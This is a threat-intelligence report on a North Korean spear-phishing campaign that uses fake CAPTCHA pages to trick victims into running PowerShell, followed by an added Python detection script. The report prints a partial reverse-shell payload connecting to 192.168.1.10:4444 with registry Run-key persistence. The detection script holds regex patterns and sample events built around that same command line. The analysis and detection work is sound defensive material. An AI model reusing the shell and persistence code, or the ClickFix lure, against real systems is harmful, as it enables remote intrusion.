A sophisticated cyber espionage campaign attributed to the North Korean advanced persistent threat (APT) group Velvet Chollima has emerged, targeting South Korean government officials and organizations across multiple continents through weaponized PDF documents and innovative social engineering techniques.
The Velvet Chollima APT group has launched an extensive cyber campaign beginning in January 2025, specifically targeting South Korean government officials, NGOs, government agencies, and media companies across North America, South America, Europe, and East Asia.
The attackers employ a sophisticated multi-stage approach that begins with carefully crafted spear-phishing emails containing malicious PDF attachments designed to establish initial contact with high-value targets.
The campaign demonstrates a significant evolution in social engineering tactics, with attackers masquerading as legitimate South Korean government officials to gradually build trust with their intended victims.
This patient approach allows the threat actors to establish rapport before delivering their malicious payloads, making the subsequent attack more likely to succeed.
Offensive Security Engineer Abdulrehman Ali identified this attack pattern as part of a comprehensive adversary simulation based on research from Microsoft’s Threat Intelligence team.
The analysis reveals that when targets attempt to open the seemingly legitimate PDF documents, they are redirected to fraudulent device registration pages that employ a deceptive technique known as ClickFix.
The ClickFix technique represents a concerning advancement in social engineering methodology, utilizing fake CAPTCHA verification pages to manipulate victims into executing malicious PowerShell commands.
This approach bypasses traditional security measures by convincing users to voluntarily run administrator-level commands on their systems.
Infection Mechanism and Payload Delivery
The core of the Velvet Chollima attack relies on a sophisticated fake CAPTCHA interface that automatically copies malicious PowerShell code to the victim’s clipboard.
The weaponized script establishes a reverse shell connection while implementing persistence mechanisms through Windows registry modifications:
```powershell
while ($true) {
    try {
        $client = New-Object System.Net.Sockets.TCPClient('192.168.1.10', 4444);
        $stream = $client.GetStream();
        [byte[]]$bytes = 0..65535|%{0};
        # ... (remainder of the shell loop omitted in the report)
        # Registry persistence
        $regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
        Set-ItemProperty -Path $regPath -Name $regName -Value $regValue
```
This payload enables remote command execution while ensuring persistence across system reboots, maintaining unauthorized access to compromised systems.
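As an added illustration (not part of the original report or of the researcher's simulation), the following Python runs a detection over Sysmon-style process-creation and registry-set events for the two stages described above: a PowerShell process launched from explorer.exe (the Run dialog) with a hidden window, an encoded command or a raw TCP socket client, and a Run-key value written by or pointing at a script host. The events, the SID and the vendor paths are constructed placeholders.

```python
import re
from typing import Iterable

# Constructed Sysmon-style events (not real telemetry): ID 1 = process creation,
# ID 13 = registry value set. The SID and vendor paths are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -c \"$client = New-Object "
                    "System.Net.Sockets.TCPClient('192.168.1.10', 4444); ...\""},
    {"EventID": 1, "ProcessId": 4188, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoExit -Command Get-ChildItem"},
    {"EventID": 13, "ProcessId": 4120, "Image": PS,
     "TargetObject": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": "powershell.exe -W Hidden -enc AAAA"},
    {"EventID": 13, "ProcessId": 902, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
]

# Indicators of the ClickFix chain described above: a user-launched PowerShell (explorer.exe
# parent, i.e. pasted into the Run dialog) with a hidden window, an encoded command or a raw
# TCP socket, and a Run-key value written by, or pointing at, a script host.
SUSPICIOUS_CMD = re.compile(
    r"Net\.Sockets\.TCPClient|-(?:w|windowstyle)\s+hidden|-e(?:nc|ncodedcommand)?\s", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def detect_clickfix(events: Iterable[dict]) -> list[str]:
    """Return one alert per event matching the execution or persistence stage."""
    alerts = []
    for ev in events:
        image = basename(ev["Image"])
        if ev["EventID"] == 1:
            if (image in SCRIPT_HOSTS and basename(ev["ParentImage"]) == "explorer.exe"
                    and SUSPICIOUS_CMD.search(ev["CommandLine"])):
                alerts.append(f"clickfix-exec pid={ev['ProcessId']}: {ev['CommandLine'][:60]}")
        elif ev["EventID"] == 13 and RUN_KEY.search(ev["TargetObject"]):
            value_name = ev["TargetObject"].rsplit("\\", 1)[-1]
            if image in SCRIPT_HOSTS or any(h in ev["Details"].lower() for h in SCRIPT_HOSTS):
                alerts.append(f"clickfix-persist pid={ev['ProcessId']}: Run\\{value_name} -> {ev['Details']}")
    return alerts

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

Correlating the two alerts on the same process id (as in the sample) is what ties the execution stage to the persistence stage in an investigation.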